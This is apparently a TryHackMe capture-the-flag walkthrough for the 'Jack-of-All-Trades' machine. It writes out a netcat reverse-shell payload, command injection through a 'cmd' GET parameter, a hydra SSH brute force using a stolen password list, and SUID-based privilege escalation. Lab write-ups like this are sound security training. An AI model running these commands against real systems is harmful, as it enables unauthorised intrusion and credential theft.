Jack-of-All-Trades

Jack-of-All-Trades

TryHackMe | Jack-of-All-Trades

First of all, this write up is quite long so be patient and stay tunned coz it's a fun box and you may 

learn something new so take your notes and let's jump into this machine

starting with enumeration we ganna use Nmap for that to see what ports and services are running

as we can see there are web service and ssh but both of them running on different ports so keep that in mind 

let's go to the website and check this out but first, we need to allow HTTP to run port 22 you need to follow these steps 

1- Select and copy the following preference name

network.security.ports.banned.override

2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful.

3- In the search box above the list, type or paste ports and pause while the list is filtered

If the above-listed preference exists:

4- Double-click it and add a comma to the end of the list followed by the port number you need to allow. No spaces. Then click OK.

If the above-listed preference does not exist:

5- right-click anywhere on the page and choose New > String

6- In the preference name dialog, paste the name you copied and click OK

7- In the preference value dialog, type in the port number you need to allow, then click OK.

after applying these steps go and open the URL http://machine-IP:22

now we got webpage and let's view its source and see if something hidden 

as we can see there is a note that refers to hidden page /recovery.php and some hash that we need to crack

let's first crack this it seems like base64 you can use online tools or your terminal 

the cracked note was 

Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! 

Also gotta remember your password: you-ganna-found-password-here

and also we have a name so let's search this

so we have found a twitter account take a look at his twitter coz he identifies the exact hashing methodology

now let's visit that page /recovery.php

it requires username and password let's take a look at the source page 

there is another hash let's crack it with the methodology that Johny Graves tweets.

the cracked note was 

Remember that the credentials to the recovery login are hidden on the homepage! 

I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S

let's visit that link

I didn't know exactly what is this but I think he is referring to dinosaur image located in home page

so let's save it you can save it directly or go to /assets you ganna find all pictures that are in home page

first one called stego.jpg so from its name I think he refers to use steghide 

use: steghide extract -sf stego.jpg 

this will extract the image but you ganna asked for password this password what we have found in the first cracked note 

with base64 encryption method 

as you can see we have got a funny message said that this isn't the one xD 

so let's try the second one header.jpg

yes this is it you now got username and password we ganna use those in recovery page we found so let's do it

there is a message said 

GET me a 'cmd' and I'll run it for you Future-Jack. 

I think he writes GET in upper case referring to GET method so we ganna use URL and also he referred to use cmd and this technique is not new 

there are payloads in your kali machine that uses the same method so let's add cmd parameter and give it a command and see what happened 

use: http://machine-IP:22/nnxhweOV/index.php?cmd=ls

as we can see we have now RCE and we were able to list directory file so I will use one line Netcat reverse shell

first set up your netcat listener 

use: nc -nvlp 4444

second, use this payload in cmd parameter 

use: nc -e /bin/sh your-machine-IP 4444

*pro tip if you wanna convert Netcat shell to regular shell just use this

/usr/bin/script -qc /bin/bash /dev/null

and now we got our shell 

if we navigate to /home directory you ganna find jack home but you can't access it but you will see an interesting file

called jacks_password_list 

cat it and take its list and save it in your machine as txt file coz you ganna use hydra to brute force ssh

use: hydra -l jack -P jack-passwords-list-path -s 80 ssh://machine-IP

-s 80 to tell hydra that ssh is running in port 80 instead of 22 go ahead and run this you ganna get jack password

after login you ganna see only one pic in jack's home go ahead and download it 

you can download anything from ssh using SCP 

use: scp user.jpg your-username@your-machine-IP:/your-dir

you ganna asked for your local ssh password

after downloading it go ahead and just open it don't try to do what is did "trying to extract data from it xD"

you ganna find the user flag! 

user flag Done! ✌

now time from root flag 

use: sudo -l 

looks like jack can't run any sudo command! so let's find out what executable file we can find

use: find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null 

as we can see we can run strings as root!

so let's do it 

use: strings /root/root.txt 

 

that's it Jack-of-All-Trades rooted! ✌

I hope you enjoyed this fun machine see you in another one.